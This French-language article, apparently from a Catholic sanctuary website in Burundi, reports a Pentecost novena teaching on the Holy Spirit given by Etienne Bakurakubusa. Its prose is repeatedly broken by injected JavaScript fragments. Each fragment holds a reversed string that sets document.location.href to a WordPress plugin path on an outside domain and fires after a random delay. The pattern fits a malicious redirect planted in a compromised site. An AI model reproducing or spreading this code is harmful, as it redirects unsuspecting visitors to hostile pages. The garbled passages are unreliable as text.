Le mercredi 5juin 2019, sixième jour de la prière de neuf jours (neuvaine), organisée dans l’intention de se préparer pour mieux célébrer Pentecôte.

Au Sanctuaire marial de Schoenstatt Mont Sion Gikungu, l’Enseignement qu’ont reçu les fidèles après la louange, a été dispensé par M Etienne BAKURAKUBUSA, avec le thème suivant : «  Puisque l’Esprit est notre vie, que l’Esprit nous fasse aussi agir. »

En grosso motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do, il a d’abord rappelé les thèmes développés, du premier au cinquième jour et a martelé : «  Que la Pentecôte de cette année soit comme la première et le dernière pour toi. C’est une occasion favorable de laisser le Seigneur te sauver. » Il disait ainsi pour insister sur l’importance que toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit accorder chacun à tous ces  enseignements déjà reçus. « Que ça ne soit pas une perte de temps, a-t-il ajouté.

Il a alors montré comment et pourquoi les gens vivent de l’Esprit : « Depuis la création, dit-il, ce qui a fait l’homme vivant c’est l’Esprit que Dieu avait déposé en lui. Sinon, il n’était qu’un simple objet en argile. »

En  l’absence de  l’Esprit de Dieu, la vie est impossible, parce que c’est bien lui qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la vie. « Parmi ses tâches, dit le développant, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner la vie c’est sa première tâche. » Il a continué en disant que Dieu, après avoir créé l’homme, l’Esprit l’a rempli sa force et son intelligence. Il a profité pour rappeler que celui qui sent en lui la force de lutter contre le mal, la force de lutter pour la consolidation de la paix, de lutter pour la justice, ce n’est pas sa force, c’est plutôt la force d’en haut.

« Et toi qui sens la tristesse, l’angoisse, la haine, la jalousie en toi, ce ne pas non plus ta force, ce sont les esprits mauvais qui agissent en toi. Mais n’aies pas peur, le Christ n’a autre désir que de te voir libre et sauvé et il t’envoie aujourd’hui son Esprit qui va chasser tous les esprits impures, a-t-il tranquillisé.

Il a aussi fait savoir que l’esprit mauvais ne souffle que les injures et les malédictions, contrairement à l’Esprit de Dieu qui souffle les mots dignes de bénédictions.

Qu’est-ce qui aide quelqu’un à demeurer en relation avec Dieu ?

Dans les sacrements de baptême, de confirmation et de l’eucharistie l’Esprit Saint est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné à tout un chacun, et c’est sans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute lui qui  fortifie et garde cette relation entre l’homme et son Dieu.

Comment distinguer les deux voix ? (Celle de l’Esprit de Dieu et celle de l’esprit impure)

Comme l’a dit M Etienne, il est important d’être attentif et calme, mais aussi être capable de prendre une décision dans la vie, ça veut dire être radical. « Le sérieux est de contacter les sages et les hommes de l’Eglise pour te guider, ainsi il a terminé.

Apres cette instruction, les participants se sont mis en groupes de quatre pour échanger sur ce qui a pu toucher et aider depuis le début, chacun parmi eux.

 

Brigitte IRAKOZE

Laisser un commentaire